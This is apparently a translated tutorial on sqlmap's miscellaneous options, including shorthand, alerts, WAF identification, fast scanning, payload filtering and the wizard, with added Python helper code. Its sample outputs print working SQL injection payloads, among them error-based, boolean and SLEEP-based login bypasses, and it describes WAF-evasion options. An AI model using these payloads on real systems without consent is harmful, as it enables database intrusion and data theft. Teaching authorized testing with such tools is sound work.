
Security Testing === sqlmap (Part 4) (reposted)


XVIII. Miscellaneous

1. Using abbreviations

Option: -z

Some option combinations are used very often, for example "--batch --random-agent --ignore-proxy --technique=BEU". Writing out such a long string every time is unwieldy, so sqlmap provides a shorthand that shortens the command line.

With "-z", each option can be written as just its first few letters; "--batch", for instance, can be shortened to "bat". The rule is that the abbreviation must be distinguishable and map to exactly one option. Abbreviations are separated by commas. For example:

  python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

can be abbreviated to:

  python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

Another example:

  python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

can be abbreviated to:

  python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
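
To show how the unique-prefix rule works, here is an expander written for this page (not sqlmap's own code) that turns the two -z strings above into full options. It matches abbreviations against option names with the dashes removed, which is why "randoma" is needed to separate "--random-agent" from "--randomize"; the option list is a constructed subset, and ambiguous abbreviations are rejected outright (an assumption for this example; the page only requires that they be unique).

```python
from typing import List

# Constructed subset of real sqlmap option names (assumption: the real list
# comes from sqlmap's option parser; only these are resolvable here).
KNOWN_OPTIONS = [
    "-u", "-D", "-T", "-C", "--batch", "--random-agent", "--randomize",
    "--ignore-proxy", "--technique", "--flush-session", "--dump", "--dump-all",
    "--dbs", "--dbms", "--data", "--tamper", "--threads", "--test-filter",
    "--test-skip",
]


def resolve_mnemonic(name: str, options: List[str] = KNOWN_OPTIONS) -> str:
    """Map one abbreviation to exactly one option; dashes are ignored on both sides."""
    name = name.replace("-", "")
    by_bare = {opt.replace("-", ""): opt for opt in options}
    if name in by_bare:                  # an exact name wins: "dump" is not "dump-all"
        return by_bare[name]
    hits = [opt for bare, opt in by_bare.items() if bare.startswith(name)]
    if not hits:
        raise ValueError(f"mnemonic '{name}' can't be resolved to any option")
    if len(hits) > 1:                    # "random" could be --random-agent or --randomize
        raise ValueError(f"mnemonic '{name}' is ambiguous: {', '.join(hits)}")
    return hits[0]


def expand_shorthand(shorthand: str, options: List[str] = KNOWN_OPTIONS) -> List[str]:
    """Expand a -z string such as "bat,randoma,ign,tec=BEU" into argv tokens."""
    argv: List[str] = []
    for item in shorthand.split(","):
        item = item.strip()
        if not item:
            continue
        name, _, value = item.partition("=")
        opt = resolve_mnemonic(name, options)
        if value == "":
            argv.append(opt)
        elif opt.startswith("--"):       # long options take --name=value
            argv.append(f"{opt}={value}")
        else:                            # short options take a separate argument
            argv.extend([opt, value])
    return argv
```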

2. Alert when an injection point is found

Option: --alert

This option raises an alert whenever a new injection point is found; it is followed by the command used to raise the alert, e.g.:

  python sqlmap.py -r data.txt --alert "notify-send '找到漏洞了'"

Part of the output:

  [18:59:36] [INFO] GET parameter 'couno' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable (with --not-string="001")
  [18:59:36] [INFO] executing alerting shell command(s) ('notify-send '找到漏洞了'')

The alert command in the example above is Ubuntu's notify-send.

3. Setting answers to questions

Option: --answers

When running non-interactively with "--batch", every question is answered with its default. Sometimes you want non-interactive mode without accepting the default answer; "--answers" lets you answer specific questions, with multiple answers separated by commas. For example:

  python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch

Part of the output:

  [xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
  heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N

4. Beep when an injection point is found

Option: --beep

With this option sqlmap beeps whenever it successfully detects an injection point. This is especially useful when testing a large number of sites from a log file with "-m".

5. Clean up temporary tables and user-defined functions created by sqlmap

Option: --cleanup

It is strongly recommended to run this option once testing is finished so that the temporary tables and user-defined functions sqlmap created are removed; sqlmap will clean its traces from the DBMS and the file system as far as it can.

6. Check dependencies

Option: --dependencies

Some sqlmap features depend on third-party libraries, and when such a feature is used while the library is missing, sqlmap reports an error and exits. This option checks whether the required third-party libraries are installed, e.g.:

  python sqlmap.py --dependencies

Part of the output:

  [*] starting at 19:16:05

  [19:16:05] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS 'Firebird'. Download from http://kinterbasdb.sourceforge.net/
  [19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Sybase'. Download from https://github.com/pymssql/pymssql
  [19:16:05] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS 'Oracle'. Download from http://cx-oracle.sourceforge.net/
  [19:16:05] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS 'PostgreSQL'. Download from http://initd.org/psycopg/
  [19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'IBM DB2'. Download from https://github.com/ibmdb/python-ibmdb
  [19:16:05] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS 'HSQLDB'. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
  [19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'Informix'. Download from https://github.com/ibmdb/python-ibmdb
  [19:16:05] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS 'Microsoft Access'. Download from https://github.com/mkleehammer/pyodbc
  [19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Microsoft SQL Server'. Download from https://github.com/pymssql/pymssql
  [19:16:05] [WARNING] sqlmap requires 'python-impacket' third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/
  [19:16:05] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
  [19:16:05] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/

  [*] shutting down at 19:16:05

As you can see, what I am missing is mainly the third-party libraries used to connect directly to databases.

7. Disable colored output

Option: --disable-coloring

8. Use a specific page of the Google dork results

Option: --gpage

With "-g", sqlmap by default takes the first 100 Google dork results for injection testing. Combined with this option, a specific page of the Google dork results can be used instead.

9. Use HTTP parameter pollution

Option: --hpp

HTTP parameter pollution is a technique for bypassing WAF/IPS/IDS protection; see the linked article for details. It is particularly effective against the ASP/IIS and ASP.NET/IIS platforms. If the target is suspected to be protected by a WAF/IPS/IDS, this option can be tried to get past it.

10. Thoroughly test for WAF/IPS/IDS

Option: --identify-waf

sqlmap can identify WAF/IPS/IDS products so that the user can act accordingly (e.g. add "--tamper"). sqlmap currently supports detection of more than 30 different WAF/IPS/IDS products, such as Airlock and Barracuda WAF. The WAF detection scripts can be found in the waf directory of the installation.

In the following example the target is MySQL protected by the ModSecurity WAF:

  python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3

Part of the output:

  [xx:xx:23] [INFO] testing connection to the target URL
  [xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
  [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
  [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
  [xx:xx:23] [DEBUG] page not found (404)
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
  [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
  [xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')

Option: --skip-waf

By default sqlmap sends a dummy SQL injection payload to probe whether the target has some kind of protection. If this causes any problem, the user can disable it with "--skip-waf".

11. Imitate a smartphone

Option: --mobile

Some sites return different content to smartphones than to desktop browsers. To test the smartphone version of such a site you can set a smartphone User-Agent or, more simply, use this option: sqlmap will then ask at run time which popular phone to imitate, e.g.:

  $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
  [...]
  which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
  [1] Apple iPhone 4s (default)
  [2] BlackBerry 9900
  [3] Google Nexus 7
  [4] HP iPAQ 6365
  [5] HTC Sensation
  [6] Nokia N97
  [7] Samsung Galaxy S
  > 1
  [...]

12. Offline mode (use session data only)

Option: --offline

With this option sqlmap only uses previously stored session data for testing and sends no packets to the target.

13. Show page rank for Google dork results

Option: --page-rank

Used together with "-g", this makes sqlmap issue more requests to Google and display the page rank of each result.

14. Safely remove all content from the output directory

Option: --purge-output

Use this option when you want to securely delete everything in the output directory. Secure deletion is more than plain deletion: before anything is deleted, the existing data is overwritten with random data, and even file and directory names are renamed so that the old names are overwritten; only after all overwriting is done is the deletion performed. In the end, nothing is left in the output directory. For example:

  python sqlmap.py --purge-output -v 3

Part of the output:

  [*] starting at 19:51:36

  [19:51:36] [DEBUG] cleaning up configuration parameters
  [19:51:36] [INFO] purging content of directory '/home/werner/.sqlmap/output'...
  [19:51:36] [DEBUG] changing file attributes
  [19:51:36] [DEBUG] writing random data to files
  [19:51:36] [DEBUG] truncating files
  [19:51:36] [DEBUG] renaming filenames to random values
  [19:51:36] [DEBUG] renaming directory names to random values
  [19:51:36] [DEBUG] deleting the whole directory tree

  [*] shutting down at 19:51:36
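
The log above lists the purge steps one by one; the following is an added example (not sqlmap's implementation) that carries out the same sequence on a directory: make entries writable, overwrite each file with random bytes, truncate, rename files and then directories to random names, and finally remove the tree. The directory layout built by demo_purge is constructed for the demonstration.

```python
import os
import secrets
import shutil
import stat
import tempfile


def purge_output(directory: str) -> int:
    """Wipe `directory` in the order the --purge-output log shows; returns files overwritten."""
    if not os.path.isdir(directory):
        return 0
    wiped = 0
    for root, dirs, files in os.walk(directory):            # changing file attributes
        for name in dirs + files:
            path = os.path.join(root, name)
            if os.path.islink(path):                         # never chmod through a symlink
                continue
            os.chmod(path, stat.S_IMODE(os.stat(path).st_mode) | stat.S_IWUSR)
    for root, _, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if os.path.islink(path):                         # a link's target is not ours to wipe
                continue
            remaining = os.path.getsize(path)
            with open(path, "r+b") as fh:                    # writing random data to files
                while remaining > 0:
                    chunk = min(remaining, 1 << 16)
                    fh.write(secrets.token_bytes(chunk))
                    remaining -= chunk
                fh.flush()
                os.fsync(fh.fileno())
                fh.truncate(0)                               # truncating files
            wiped += 1
    for root, dirs, files in os.walk(directory, topdown=False):
        for name in files:                                   # renaming filenames to random values
            os.rename(os.path.join(root, name), os.path.join(root, secrets.token_hex(8)))
        for name in dirs:                                    # renaming directory names to random values
            os.rename(os.path.join(root, name), os.path.join(root, secrets.token_hex(8)))
    shutil.rmtree(directory)                                 # deleting the whole directory tree
    return wiped


def demo_purge() -> tuple:
    """Build a throwaway output dir with two files, purge it, report (wiped, still_exists)."""
    base = tempfile.mkdtemp(prefix="sqlmap-output-")
    os.mkdir(os.path.join(base, "target.example"))
    with open(os.path.join(base, "target.example", "log"), "wb") as fh:
        fh.write(b"extracted rows\n" * 100)
    with open(os.path.join(base, "target.example", "session.sqlite"), "wb") as fh:
        fh.write(b"\x00" * 4096)
    return purge_output(base), os.path.exists(base)
```

Overwriting in place only helps on storage that rewrites blocks in place; on SSDs with wear levelling and on copy-on-write or snapshotting file systems the old blocks can survive, so engagement data should also sit on an encrypted volume.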

15. Fast scan

Option: --smart

When there are many URLs to test (e.g. with "-m"), the goal is to find some of the injection points as fast as possible, and missing a few does not matter, "--smart" can be used to run thorough tests only on positive heuristics: only parameters that make the DBMS raise an error are tested further, and all other URLs are skipped. For example:

  $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
  [...]
  [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
  [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
  [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
  [xx:xx:14] [INFO] skipping GET parameter 'ca'
  [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
  [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
  [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
  [xx:xx:14] [INFO] skipping GET parameter 'user'
  [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
  [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
  [xx:xx:14] [INFO] GET parameter 'id' is dynamic
  [xx:xx:14] [WARNING] reflective value(s) found and filtering out
  [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
  heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
  [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
  [xx:xx:14] [INFO] testing 'MySQL inline queries'
  [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
  [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
  [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  [xx:xx:24] [INFO] target URL appears to have 3 columns in query
  [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  [...]
  [...]

16. Use or skip payloads by keyword

Option: --test-filter

To use only payloads containing the keyword "ROW", use "--test-filter=ROW". Below is an example with MySQL as the target:

  python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW

Part of the output:

  [xx:xx:39] [INFO] GET parameter 'id' is dynamic
  [xx:xx:39] [WARNING] reflective value(s) found and filtering out
  [xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  [xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
  [xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
  [xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' injectable
  GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
  ---
  Place: GET
  Parameter: id
      Type: error-based
      Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
      Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
  ---

Option: --test-skip

To skip payloads containing the keyword "BENCHMARK", use "--test-skip=BENCHMARK".

17. Interactive sqlmap shell

Option: --sqlmap-shell

This option opens an interactive sqlmap shell with command history. For example:

  werner@Yasser:~$ sqlmap --sqlmap-shell
          ___
         __H__
   ___ ___[.]_____ ___ ___  {1.1.10#stable}
  |_ -| . ["]     | .'| . |
  |___|_  [(]_|_|_|__,|  _|
        |_|V          |_|   http://sqlmap.org

  sqlmap-shell> -u "192.168.56.102"
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

  [*] starting at 20:22:46

  [20:22:46] [INFO] testing connection to the target URL
  [20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  [20:22:46] [INFO] testing if the target URL is stable
  [20:22:47] [INFO] target URL is stable
  [20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')

  [*] shutting down at 20:22:47

          ___
         __H__
   ___ ___[.]_____ ___ ___  {1.1.10#stable}
  |_ -| . ["]     | .'| . |
  |___|_  [(]_|_|_|__,|  _|
        |_|V          |_|   http://sqlmap.org

  sqlmap-shell> exit

18. Simple wizard for beginners

Option: --wizard

sqlmap provides a wizard for beginners whose workflow asks as few questions as possible. After entering the target, a user who simply presses Enter to accept the default answer at every step will still get a correct result. For example:

  werner@Yasser:~$ sqlmap --wizard
          ___
         __H__
   ___ ___["]_____ ___ ___  {1.1.10#stable}
  |_ -| . [)]     | .'| . |
  |___|_  ["]_|_|_|__,|  _|
        |_|V          |_|   http://sqlmap.org

  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

  [*] starting at 20:39:41

  [20:39:41] [INFO] starting wizard interface
  Please enter full target URL (-u): http://192.168.56.102/login.php
  POST data (--data) [Enter for None]: username=001&password=003
  Injection difficulty (--level/--risk). Please choose:
  [1] Normal (default)
  [2] Medium
  [3] Hard
  > 1
  Enumeration (--banner/--current-user/etc). Please choose:
  [1] Basic (default)
  [2] Intermediate
  [3] All
  > 1

  sqlmap is running, please wait..

  sqlmap resumed the following injection point(s) from stored session:
  ---
  Parameter: username (POST)
      Type: boolean-based blind
      Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
      Payload: username=001%' OR NOT 2143=2143#&password=003

      Type: AND/OR time-based blind
      Title: MySQL >= 5.0.12 OR time-based blind (comment)
      Payload: username=001%' OR SLEEP(5)#&password=003
  ---
  web server operating system: Linux Ubuntu
  web application technology: Apache 2.4.7, PHP 5.5.9
  back-end DBMS operating system: Linux Ubuntu
  back-end DBMS: MySQL >= 5.0.12
  banner:    '5.5.50-0ubuntu0.14.04.1'
  current user:    'root@localhost'
  current database:    'DSSchool'
  current user is DBA:    True

  [*] shutting down at 20:40:07
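
The result blocks printed by sqlmap come in two layouts on this page: the older "Place: GET" plus "Parameter: id" form in the --test-filter example, and the "Parameter: username (POST)" form in the wizard run above. When findings have to go into a ticket or a report, they are usually extracted from exactly these blocks; the parser below is an added example (not sqlmap code) that handles both layouts, and the two sample texts are constructed to mirror them.

```python
import re
from typing import Dict, List

# Constructed samples mirroring the two result layouts shown on this page.
OLD_LAYOUT = """\
sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*) FROM dual)
---
"""
NEW_LAYOUT = """\
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: username=001%' OR NOT 2143=2143#&password=003

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: username=001%' OR SLEEP(5)#&password=003
---
"""

# "Parameter: name" (old layout) or "Parameter: name (PLACE)" (new layout)
PARAM_RE = re.compile(r"^Parameter:\s*(?P<name>\S+)(?:\s*\((?P<place>.+)\))?\s*$")


def parse_injection_points(text: str) -> List[Dict[str, str]]:
    """One record per Type/Title/Payload triple, tagged with its place and parameter."""
    findings: List[Dict[str, str]] = []
    place = parameter = ""
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PARAM_RE.match(line)
        if line == "---":                        # block boundary closes the open record
            current = None
        elif line.startswith("Place:"):          # old layout: place on its own line
            place = line.split(":", 1)[1].strip()
        elif m:                                  # new layout carries the place in parentheses
            parameter = m.group("name")
            place = m.group("place") or place
        elif line.startswith("Type:"):           # every Type: line starts a new finding
            current = {"place": place, "parameter": parameter,
                       "type": line.split(":", 1)[1].strip(), "title": "", "payload": ""}
            findings.append(current)
        elif current is not None and line.startswith("Title:"):
            current["title"] = line.split(":", 1)[1].strip()
        elif current is not None and line.startswith("Payload:"):
            current["payload"] = line.split(":", 1)[1].strip()
    return findings


def affected_parameters(findings: List[Dict[str, str]]) -> List[str]:
    """Deduplicated 'PLACE:parameter' keys, the unit a remediation ticket is opened for."""
    return sorted({f"{f['place']}:{f['parameter']}" for f in findings})
```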

Summary

After reading the complete official sqlmap manual I finally have a fairly comprehensive understanding of sqlmap. Before, I had only heard of it; now I have really experienced how powerful sqlmap is, and I admire its two authors all the more:

  • Bernardo Damele A. G. (@inquisb)
  • Miroslav Stampar (@stamparm)

